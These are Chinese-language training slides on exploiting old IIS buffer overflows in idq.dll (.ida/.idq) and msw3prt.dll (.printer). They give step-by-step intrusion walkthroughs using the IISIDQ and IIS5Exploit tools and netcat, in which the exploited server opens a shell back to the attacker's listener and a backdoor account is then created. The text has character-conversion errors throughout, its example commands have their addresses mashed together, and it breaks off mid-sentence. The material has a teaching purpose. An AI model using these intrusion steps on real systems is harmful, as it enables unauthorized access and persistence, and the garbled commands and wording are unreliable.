學習情境三：Web效勞器的攻擊與防范項目1利用.ida&.idq漏洞的攻擊與防護工程1利用.ida&.idq漏洞的攻擊與防護課題引入IIS漏洞.ida&.idq漏洞檢測IDQ入侵工具——IISIDQ漏洞溢出連接工具-NC課題引入－工程背景黑客是信息時代的完美主義者，他們通過研究、試驗、編寫測試代碼來發(fā)現(xiàn)遠程效勞器中的漏洞通過利用遠程效勞器的漏洞，可以繞過系統(tǒng)的認證直接進入系統(tǒng)內(nèi)部常用的漏洞IIS漏洞操作系統(tǒng)漏洞SQL效勞器漏洞課題引入－工程分析完本錢工程需要解決的問題：什么是IIS漏洞？如何檢測.ida&.idq漏洞？如何使用IDQ入侵工具——IISIDQ？如何使用漏洞溢出連接工具-NC？課題引入－教學目標完本錢工程需要實現(xiàn)的教學目標：檢測.ida&.idq漏洞〔重點掌握〕IDQ入侵工具——IISIDQ〔掌握〕漏洞溢出連接工具-NC〔理解〕課題引入－應到達的職業(yè)能力熟練掌握.ida&.idq漏洞檢測的方法掌握IDQ入侵工具——IISIDQ的使用了解漏洞溢出連接工具-NC參數(shù)的含義工程問題1－IIS漏洞概述IIS〔InternetInformationServer〕，即Internet信息效勞器，它在Windows系統(tǒng)中提供Internet效勞，例如提供Web效勞、FTP效勞、SMTP效勞IIS效勞器在方便用戶使用的同時，帶來了許多平安隱患。IIS漏洞有近千余種，其中能被用來入侵的漏洞大多數(shù)屬于“溢出〞型漏洞。工程問題1－IIS漏洞概述對于溢出型漏洞，入侵者可以通過發(fā)送特定指令格式的數(shù)據(jù)使遠程效勞區(qū)的緩沖區(qū)溢出，從而突破系統(tǒng)的保護，在溢出的空間中執(zhí)行任意指令。工程問題1－主要的IIS漏洞.ida&.idq漏洞Printer漏洞Unicode漏洞.asp映射分塊編碼漏洞Webdav漏洞工程問題1－IIS漏洞信息的搜集使用掃描軟件掃描存在漏洞的主機，例如使用X-Scan進行IIS漏洞的掃描使用telnettargetIP80搜集Web效勞器版本信息工程問題2－.ida&.idq漏洞微軟的IndexServer可以加快Web的搜索能力，提供對管理員腳本河Internet數(shù)據(jù)的查詢，默認支持管理腳本.ida和查詢腳本.idq管理腳本.ida和查詢腳本.idq都是使用idq.dll來進行解析的idq.dll存在一個緩沖溢出，問題存在于idq.dll擴展程序上，由于沒有對用戶提交的輸入?yún)?shù)進行邊界檢查，可以導致遠程攻擊者利用溢出來獲得System權限訪問遠程系統(tǒng)工程問題2－.ida&.idq漏洞的檢測使用X-Scan、Sfind等檢測工具手工檢測：在地址欄中輸入://targetIP/*.ida或者://targetIP/*.idq工程問題3－IDQ入侵工具IISIDQIISIDQ有命令行和圖形界面兩種方式。使用IISIDQ攻擊遠程效勞器后，有兩種登錄方式攻擊后主動連接方式命令iisidq.exe<操作系統(tǒng)類型><目標IP><Web端口><1><端口監(jiān)聽端口>[輸入命令1]工程問題3－IDQ入侵工具IISIDQ攻擊后監(jiān)聽遠程效勞器連接命令iisidq.exe<操作系統(tǒng)類型><目標IP><Web端口><2><溢出連接IP><溢出連接端口>[輸入命令1]如果不寫輸入命令，默認命令為cmd.exe/c+dir。如果使用1，表示不使用默認命令而是要用戶輸入命令IISIDQ支持的操作系統(tǒng)類型0IIS5中文Win2000Sp01IIS5中文Win2000Sp12IIS5中文Win2000Sp2工程問題4－漏洞溢出連接工具NCnc在網(wǎng)絡工具中有“瑞士軍刀〞的美譽，通過nc，入侵者可以方便的連接遠程效勞器nc有兩種方法進行連接主動連接到外部：nc[-options]hostnameport[s][ports]監(jiān)聽等待外部連接：nc–l–pport[-option][hostname][port]NC的使用參數(shù)說明-e:prog程序重定向，一旦連接，就執(zhí)行-g:網(wǎng)關路由跳數(shù),可設置到8-h：幫助信息-i：secs延時的間隔-l：監(jiān)聽模式，用于入站連接-n：指定數(shù)字的IP地址，不能用hostname-o：file記錄16進制的傳輸NC的使用參數(shù)說明-r：任意指定本地及遠程端口-s：addr本地源地址-u：UDP模式-v：詳細輸出〔用兩個-v可得到更詳細的內(nèi)容〕-w：secs超時時間-z：將輸入輸出關掉——用于掃描時.idq入侵實例〔一〕步驟一：掃描遠程效勞器步驟二：IDQ溢出。使用連接方式一進行idq漏洞溢出。使用的命令為iisidq006801521.idq入侵實例〔一〕步驟三：使用nc進行連接。使用命令nc–v06521。.idq入侵實例〔一〕步驟四：建立后門帳號步驟五：使用exit命令斷開連接比較命令如下圖.idq入侵實例〔二〕步驟一：掃描遠程效勞器步驟二：使用nc在本地翻開端口等待連接。使用命令nc-l–p250。參數(shù)-l表示使用監(jiān)聽模式，-p表示設置本地監(jiān)聽端口250.idq入侵實例〔二〕步驟三：IDQ溢出。使用命令iisidq006802002501采用方式二進行溢出，使遠程效勞器溢出后自動連接到本地計算機的250端口.idq入侵實例〔二〕步驟四：進行溢出后的攻擊步驟五：建立后門帳號步驟六：使用exit命令斷開連接IISIDQ的圖形界面.printer漏洞windows2000IIS5存在打印擴展ISAPI〔InternetServiceApplicationProgrammingInterface〕，使得.printer擴展與msw3prt.dll進行映射，該擴展可以通過Web調(diào)用打印機在msw3prt.dll中存在緩沖區(qū)溢出漏洞微軟建議，一般在未打補丁之前，一定要移除ISAPI網(wǎng)絡打印的映射.printer漏洞入侵步驟一：使用nc監(jiān)聽端口步驟二：使用IIS5Exploit進行漏洞溢出，命令格式IIS5Exploit<目標IP><入侵者IP><本地監(jiān)聽端口>總結完本錢工程的學習之后，我們已經(jīng)掌握了基于認證入侵的